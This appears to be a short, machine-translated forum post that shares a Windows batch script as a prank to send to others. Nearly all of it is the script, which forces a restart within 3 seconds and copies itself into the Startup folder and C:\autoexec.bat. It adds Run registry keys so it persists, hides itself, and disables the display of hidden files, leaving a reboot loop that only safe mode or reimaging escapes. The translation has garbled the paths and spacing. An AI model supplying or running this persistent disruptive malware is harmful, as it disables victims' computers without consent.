I'm sending you a few things, ''''. When you're bored, you can play with others.
The batch processing of repeated restarts, as the name implies, is to let others start, restart, and repeat all the time.Code
@ Echo off
Shutdown-R-T 3
Copy % 0 C: \ Documents ents "" and "" Settings \ All "" Users \ "start" Menu \Program\ Start \ A. bat
Copy % 0 C: \ autoexec. bat
Reg add HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run/V autoexec. BAT/T REG_SZ/d c: \ autoexec. BAT/F
Reg add HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run/V autoexec. BAT/T REG_SZ/d c: \ autoexec. BAT/F
Attrib autoexec. Bat + R + S + H
Reg add HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced \ Folder \ Hidden \ showall/V checkedvalue/T REG_DWORD/d 00000000/F
Del % 0
3 seconds to restart. After the startup Item is added, it will take 3 seconds to countdown. Hey, if you don't want to restart, you can go to safe mode or ghost. I have no other options.